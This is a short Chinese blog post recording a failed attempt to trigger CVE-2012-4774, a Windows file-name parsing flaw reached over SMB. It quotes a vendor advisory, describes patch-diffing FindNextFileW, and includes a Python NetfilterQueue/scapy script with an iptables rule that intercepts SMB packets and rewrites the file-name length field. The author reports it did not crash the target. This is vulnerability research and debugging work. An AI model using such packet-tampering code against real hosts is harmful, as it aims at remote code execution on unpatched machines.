CVE-2012-4774不崩溃

想让CVE-2012-4774崩溃下,然后继续调试崩溃,结果他丫就是不崩

看了下,http://www.mcafee.com/us/resources/release-notes/foundstone/fsl_12_12_2012.pdf

mcafee说CVE-2012-4774

The flaw lies in the parsing of file names. Successful exploitation could allow an attacker to execute remote code. The exploit

requires the user to browse a file system containing malicious files.

 

补丁对比下,FindNextFileW存在问题

新的补丁处增加了mov eax,206h,对SMB的File Name Len字段进行了判断,大致知道情况

尝试为这个漏洞写了个修改数据包攻击的代码(samba目录下有个123命名的文件):

'''

please increase this in iptables

   iptables -I OUTPUT -d 192.168.0.0/24 -j NFQUEUE --queue-num 1

'''

 

from netfilterqueue import NetfilterQueue

from scapy.all import *

 

__vis_filter = """................................ !"#$%&\'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[.]^_`abcdefghijklmnopqrstuvwxyz{|}~..........

......................................................................................................................."""

 

def hexdump(buf, length=16):

    """Return a hexdump output string of the given buffer."""

    n = 0

    res = []

    while buf:

        line, buf = buf[:length], buf[length:]

        hexa = ' '.join(['%02x' % ord(x) for x in line])

        line = line.translate(__vis_filter)

        res.append('  %04d:  %-*s %s' % (n, length * 3, hexa, line))

        n += length

    return '\n'.join(res)

    #return hexa

 

def print_and_accept(pkt):

    data = hexdump(pkt.get_payload())

    print data

    pkt.accept()

 

def process(payload):

    data = payload.get_payload()

    if data.find('\x06\x00\x00\x00') != -1 and len(data) == 408:

        data2 = data.replace(data[-40:-36],'\x58\x02\x00\x00')

        pkt = IP(data2)

        print hexdump(str(pkt))

        send(pkt,verbose=0)

        payload.drop()

    else:

        payload.accept()

    #payload.accept()

 

def main():

    nfqueue = NetfilterQueue()

    nfqueue.bind(1, process)

    try:

        nfqueue.run()

    except KeyboardInterrupt:

        print "now exist"

if __name__ == "__main__": main()

结果杯具,没能成功崩溃,唉,继续探索

 

posted @ 2012-12-27 21:56  yarpee  阅读(384)  评论(0编辑  收藏  举报